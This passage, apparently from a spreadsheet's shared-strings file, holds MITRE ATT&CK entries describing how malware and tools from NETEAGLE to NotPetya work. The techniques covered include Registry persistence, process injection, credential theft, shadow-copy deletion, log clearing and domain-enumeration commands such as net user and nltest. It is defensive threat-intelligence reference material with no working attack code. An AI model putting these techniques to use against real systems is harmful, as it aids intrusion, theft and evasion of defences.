    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) will attempt to detect if the infected host is configured to a proxy. If so, [NETEAGLE](https://attack.mitre.org/software/S0034) will send beacons via an HTTP POST request. [NETEAGLE](https://attack.mitre.org/software/S0034) will also use HTTP to download resources that contain an IP address and Port Number pair to connect to for further C2.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) allows adversaries to execute shell commands on the infected host.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can discover and close windows on controlled systems.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to compress archived screenshots.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has used a custom encryption algorithm to encrypt collected data.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can automatically archive collected data.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can retrieve passwords from messaging and mail client applications.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to steal credentials from web browsers including Internet Explorer, Opera, Yandex, and Chrome.(Citation: FireEye NETWIRE March 2019)(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can use crontabs to establish persistence.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can encrypt C2 communications.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to search for files on the compromised host.(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can copy itself to and launch itself from hidden folders.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can downloaded payloads from C2 to the compromised host.(Citation: FireEye NETWIRE March 2019)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>The [NETWIRE](https://attack.mitre.org/software/S0198) client has been signed by fake and invalid digital certificates.(Citation: McAfee Netwire Mar 2015)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can perform keylogging.(Citation: McAfee Netwire Mar 2015)(Citation: FireEye APT33 Webinar Sept 2017)(Citation: FireEye NETWIRE March 2019)(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can use launch agents for persistence.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to write collected data to a file created in the &lt;code&gt;./LOGS&lt;/code&gt; directory.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has been executed through luring victims into opening malicious documents.(Citation: FireEye NETWIRE March 2019)(Citation: Unit 42 NETWIRE April 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has been executed through convincing victims into clicking malicious links.(Citation: FireEye NETWIRE March 2019)(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has masqueraded as legitimate software including TeamViewer and macOS Finder.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) stores its configuration file within the Registry.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can use Native API including &lt;code&gt;CreateProcess&lt;/code&gt; &lt;code&gt;GetProcessById&lt;/code&gt;, and &lt;code&gt;WriteProcessMemory&lt;/code&gt;.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can use TCP in C2 communications.(Citation: Red Canary NETWIRE January 2020)(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has used a custom obfuscation algorithm to hide strings including Registry keys, APIs, and DLL names.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can persist via startup options for Login items.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>The [NETWIRE](https://attack.mitre.org/software/S0198) binary has been executed via PowerShell script.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can discover processes on compromised hosts.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>The [NETWIRE](https://attack.mitre.org/software/S0198) payload has been injected into benign Microsoft executables via process hollowing.(Citation: FireEye NETWIRE March 2019)(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can inject code into system processes including notepad.exe, svchost.exe, and vbc.exe.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can implement use of proxies to pivot traffic.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) creates a Registry start-up entry to establish persistence.(Citation: McAfee Netwire Mar 2015)(Citation: Red Canary NETWIRE January 2020)(Citation: Unit 42 NETWIRE April 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can create a scheduled task to establish persistence.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can capture the victim's screen.(Citation: McAfee Netwire Mar 2015)(Citation: FireEye NETWIRE March 2019)(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has used .NET packer tools to evade detection.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has been spread via e-mail campaigns utilizing malicious attachments.(Citation: Unit 42 NETWIRE April 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has been spread via e-mail campaigns utilizing malicious links.(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can use AES encryption for C2 data transferred.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can discover and collect victim system information.(Citation: McAfee Netwire Mar 2015)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can collect the IP address of a compromised host.(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can capture session logon details from a compromised host.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to use &lt;code&gt;/bin/bash&lt;/code&gt; and &lt;code&gt;/bin/sh&lt;/code&gt; to execute commands.(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has been executed through use of VBScripts.(Citation: FireEye NETWIRE March 2019)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to communicate over HTTP.(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has used web services including Paste.ee to host payloads.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can issue commands using cmd.exe.(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can use XDG Autostart Entries to establish persistence.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) uses the Windows call SetWindowsHookEx and begins injecting it into every GUI process running on the victim's machine.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) uses a unique, custom de-obfuscation technique.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) can delete files to cover tracks.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) has used FTP for C2 communications.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) has downloaded a remote module for execution.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) can collect data from the victim and stage it in &lt;code&gt;LOCALAPPDATA%\MicroSoft Updatea\uplog.tmp&lt;/code&gt;.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) is written to %LOCALAPPDATA%\MicroSoft Updatea\svServiceUpdate.exe prior being executed in a new process in an apparent attempt to masquerade as a legitimate folder and file.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) uses Base64 encoding for strings.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) has established persistence by writing the payload to the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) has used rundll32 for execution.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) can gather information on drives and the operating system on the victim’s machine.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) can gather information on the victim IP address.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) can collect the username from the victim’s machine.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) can collect the current timestamp of the victim's machine.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) has used HTTP for C2 communications.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[Naid](https://attack.mitre.org/software/S0205) creates Registry entries that store information about a created service and point to a malicious DLL dropped to disk.(Citation: Symantec Naid June 2012)</t>
  </si>
  <si>
    <t>[Naid](https://attack.mitre.org/software/S0205) collects a unique identifier (UID) from a compromised host.(Citation: Symantec Naid June 2012)</t>
  </si>
  <si>
    <t>[Naid](https://attack.mitre.org/software/S0205) collects the domain name from a compromised host.(Citation: Symantec Naid June 2012)</t>
  </si>
  <si>
    <t>[Naid](https://attack.mitre.org/software/S0205) creates a new service to establish.(Citation: Symantec Naid June 2012)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) uses DNS for the C2 communications.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) can change Internet Explorer settings to reduce warnings about malware activity.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) launches a script to delete their original decoy file to cover tracks.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) can download additional files from URLs.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) executes additional Jscript code on the victim's machine.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) uses mshta.exe to load its program and files.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) encodes files in Base64.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) modifies the %regrun% Registry to point itself to an autostart mechanism.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) can gather the victim computer name and serial number.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) can gather information about the victim proxy server.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) collects the username from the victim.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) executes additional VBScript code on the victim's machine.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) can capture audio feeds from the system.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) can modify the victim's firewall.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) can modify the victim's anti-virus.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) has the capability to download and activate additional modules for execution.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) can perform keylogging on the victim’s machine.(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) has the capability to edit the Registry.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336)’s plugins were obfuscated with Eazfuscater.NET 3.3.(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) creates a RunOnce key in the Registry to execute its VBS scripts each time the user logs on to the machine.(Citation: Cofense NanoCore Mar 2018)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) uses DES to encrypt the C2 traffic.(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) gathers the IP address from the victim’s machine.(Citation: DigiTrust NanoCore Jan 2017)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) can access the victim's webcam and capture data.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) uses VBS files.(Citation: Cofense NanoCore Mar 2018)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) can open a remote command-line interface and execute commands.(Citation: PaloAlto NanoCore Feb 2016) [NanoCore](https://attack.mitre.org/software/S0336) uses JavaScript files.(Citation: Cofense NanoCore Mar 2018)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) can download files remotely.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) logs the keystrokes on the targeted system.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) writes multiple outputs to a TMP file using the &gt;&gt; method.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) uses the email platform, Naver, for C2 communications, leveraging SMTP.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) uses &lt;code&gt;tasklist /v&lt;/code&gt; to check running processes.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) copies itself into a running Internet Explorer process to evade detection.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) creates a Registry key to ensure a file gets executed upon reboot in order to establish persistence.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) uses &lt;code&gt;systeminfo&lt;/code&gt; on a victim’s machine.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) leverages cmd.exe to perform discovery techniques.(Citation: Talos NavRAT May 2018) [NavRAT](https://attack.mitre.org/software/S0247) loads malicious shellcode and executes it in memory.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[Nerex](https://attack.mitre.org/software/S0210) drops a signed Microsoft DLL to disk.(Citation: Symantec Nerex May 2012)</t>
  </si>
  <si>
    <t>[Nerex](https://attack.mitre.org/software/S0210) creates a backdoor through which remote attackers can download files onto a compromised host.(Citation: Symantec Ristol May 2012)</t>
  </si>
  <si>
    <t>[Nerex](https://attack.mitre.org/software/S0210) creates a Registry subkey that registers a new service.(Citation: Symantec Nerex May 2012)</t>
  </si>
  <si>
    <t>The &lt;code&gt;net user username \password \domain&lt;/code&gt; commands in [Net](https://attack.mitre.org/software/S0039) can be used to create a domain account.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>[Net](https://attack.mitre.org/software/S0039) commands used with the &lt;code&gt;/domain&lt;/code&gt; flag can be used to gather information about and manipulate user accounts on the current domain.(Citation: Microsoft Net)</t>
  </si>
  <si>
    <t>Commands such as &lt;code&gt;net group /domain&lt;/code&gt; can be used in [Net](https://attack.mitre.org/software/S0039) to gather information about and manipulate groups.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>Commands under &lt;code&gt;net user&lt;/code&gt; can be used in [Net](https://attack.mitre.org/software/S0039) to gather information about and manipulate user accounts.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>The &lt;code&gt;net user username \password&lt;/code&gt; commands in [Net](https://attack.mitre.org/software/S0039) can be used to create a local account.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>Commands such as &lt;code&gt;net group&lt;/code&gt; and &lt;code&gt;net localgroup&lt;/code&gt; can be used in [Net](https://attack.mitre.org/software/S0039) to gather information about and manipulate groups.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>The &lt;code&gt;net use \\system\share /delete&lt;/code&gt; command can be used in [Net](https://attack.mitre.org/software/S0039) to remove an established connection to a network share.(Citation: Technet Net Use)</t>
  </si>
  <si>
    <t>The &lt;code&gt;net view \\remotesystem&lt;/code&gt; and &lt;code&gt;net share&lt;/code&gt; commands in [Net](https://attack.mitre.org/software/S0039) can be used to find shared drives and directories on remote and local systems respectively.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>The &lt;code&gt;net accounts&lt;/code&gt; and &lt;code&gt;net accounts /domain&lt;/code&gt; commands with [Net](https://attack.mitre.org/software/S0039) can be used to obtain password policy information.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>Commands such as &lt;code&gt;net view&lt;/code&gt; can be used in [Net](https://attack.mitre.org/software/S0039) to gather information about available remote systems.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>Lateral movement can be done with [Net](https://attack.mitre.org/software/S0039) through &lt;code&gt;net use&lt;/code&gt; commands to connect to the on remote systems.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>The &lt;code&gt;net start&lt;/code&gt; and &lt;code&gt;net stop&lt;/code&gt; commands can be used in [Net](https://attack.mitre.org/software/S0039) to execute or stop Windows services.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>Commands such as &lt;code&gt;net use&lt;/code&gt; and &lt;code&gt;net session&lt;/code&gt; can be used in [Net](https://attack.mitre.org/software/S0039) to gather information about network connections from a particular host.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>The &lt;code&gt;net start&lt;/code&gt; command can be used in [Net](https://attack.mitre.org/software/S0039) to find information about Windows services.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>The &lt;code&gt;net time&lt;/code&gt; command can be used in [Net](https://attack.mitre.org/software/S0039) to determine the local or remote system time.(Citation: TechNet Net Time)</t>
  </si>
  <si>
    <t>[Net Crawler](https://attack.mitre.org/software/S0056) uses credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) and [Windows Credential Editor](https://attack.mitre.org/software/S0005) to extract cached credentials from Windows systems.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>Password Cracking</t>
  </si>
  <si>
    <t>[Net Crawler](https://attack.mitre.org/software/S0056) uses a list of known credentials gathered through credential dumping to guess passwords to accounts as it spreads throughout a network.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[Net Crawler](https://attack.mitre.org/software/S0056) uses Windows admin shares to establish authenticated sessions to remote systems over SMB as part of lateral movement.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[Net Crawler](https://attack.mitre.org/software/S0056) uses [PsExec](https://attack.mitre.org/software/S0029) to perform remote service manipulation to execute a copy of itself as part of lateral movement.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[NetTraveler](https://attack.mitre.org/software/S0033) reports window names along with keylogger information to provide application context.(Citation: Kaspersky NetTraveler)</t>
  </si>
  <si>
    <t>[NetTraveler](https://attack.mitre.org/software/S0033) contains a keylogger.(Citation: Kaspersky NetTraveler)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can encrypt files on infected machines to extort victims.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457)'s PowerShell script can decode and decrypt multiple layers of obfuscation, leading to the [Netwalker](https://attack.mitre.org/software/S0457) DLL being loaded into memory.(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can detect and terminate active security software-related processes on infected systems.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>The [Netwalker](https://attack.mitre.org/software/S0457) DLL has been injected reflectively into the memory of a legitimate running process.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>Operators deploying [Netwalker](https://attack.mitre.org/software/S0457) have used psexec and certutil to retrieve the [Netwalker](https://attack.mitre.org/software/S0457) payload.(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can delete the infected system's Shadow Volumes to prevent recovery.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>Operators deploying [Netwalker](https://attack.mitre.org/software/S0457) have used psexec to copy the [Netwalker](https://attack.mitre.org/software/S0457) payload across accessible systems.(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can add the following registry entry: &lt;code&gt;HKEY_CURRENT_USER\SOFTWARE\{8 random characters}&lt;/code&gt;.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can use Windows API functions to inject the ransomware DLL.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457)'s PowerShell script has been obfuscated with multiple layers including base64 and hexadecimal encoding and XOR-encryption, as well as obfuscated PowerShell functions and variables. [Netwalker](https://attack.mitre.org/software/S0457)'s DLL has also been embedded within the PowerShell script in hex format.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) has been written in PowerShell and executed directly in memory, avoiding detection.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can detect and terminate active security software-related processes on infected systems.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can terminate system processes and services, some of which relate to backup software.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can determine the system architecture it is running on to choose which version of the DLL to use.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>Operators deploying [Netwalker](https://attack.mitre.org/software/S0457) have used batch scripts to retrieve the [Netwalker](https://attack.mitre.org/software/S0457) payload.(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can use WMI to delete Shadow Volumes.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Ngrok](https://attack.mitre.org/software/S0508) can provide DGA for C2 servers through the use of random URL strings that change every 12 hours.(Citation: Zdnet Ngrok September 2018)</t>
  </si>
  <si>
    <t>[Ngrok](https://attack.mitre.org/software/S0508) has been used by threat actors to configure servers for data exfiltration.(Citation: MalwareBytes Ngrok February 2020)</t>
  </si>
  <si>
    <t>[Ngrok](https://attack.mitre.org/software/S0508) can tunnel RDP and other services securely over internet connections.(Citation: FireEye Maze May 2020)(Citation: Cyware Ngrok May 2019)(Citation: MalwareBytes Ngrok February 2020)(Citation: Trend Micro Ngrok September 2020)</t>
  </si>
  <si>
    <t>[Ngrok](https://attack.mitre.org/software/S0508) can be used to proxy connections to machines located behind NAT or firewalls.(Citation: MalwareBytes Ngrok February 2020)(Citation: Zdnet Ngrok September 2018)</t>
  </si>
  <si>
    <t>[Ngrok](https://attack.mitre.org/software/S0508) has been used by threat actors to proxy C2 connections to ngrok service subdomains.(Citation: Zdnet Ngrok September 2018)</t>
  </si>
  <si>
    <t>[Nidiran](https://attack.mitre.org/software/S0118) can download and execute files.(Citation: Symantec Backdoor.Nidiran)</t>
  </si>
  <si>
    <t>[Nidiran](https://attack.mitre.org/software/S0118) can create a new service named msamger (Microsoft Security Accounts Manager), which mimics the legitimate Microsoft database by the same name.(Citation: Symantec Backdoor.Nidiran)(Citation: Microsoft SAM)</t>
  </si>
  <si>
    <t>[Nidiran](https://attack.mitre.org/software/S0118) can create a new service named msamger (Microsoft Security Accounts Manager).(Citation: Symantec Backdoor.Nidiran)</t>
  </si>
  <si>
    <t>[Nltest](https://attack.mitre.org/software/S0359) may be used to enumerate trusted domains by using commands such as &lt;code&gt;nltest /domain_trusts&lt;/code&gt;.(Citation: Nltest Manual)(Citation: Fortinet TrickBot)</t>
  </si>
  <si>
    <t>[Nltest](https://attack.mitre.org/software/S0359) may be used to enumerate remote domain controllers using options such as &lt;code&gt;/dclist&lt;/code&gt; and &lt;code&gt;/dsgetdc&lt;/code&gt;.(Citation: Nltest Manual)</t>
  </si>
  <si>
    <t>[Nltest](https://attack.mitre.org/software/S0359) may be used to enumerate the parent domain of a local machine using &lt;code&gt;/parentdomain&lt;/code&gt;.(Citation: Nltest Manual)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) uses &lt;code&gt;wevtutil&lt;/code&gt; to clear the Windows event logs.(Citation: Talos Nyetya June 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) encrypts user files and disk structures like the MBR with 2048-bit RSA.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) can use two exploits in SMBv1, EternalBlue and EternalRomance, to spread itself to other remote systems on the network.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) searches for files ending with dozens of different file extensions prior to encryption.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) contains a modified version of [Mimikatz](https://attack.mitre.org/software/S0002) to help gather credentials that are later used for lateral movement.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: NCSC Joint Report Public Tools)</t>
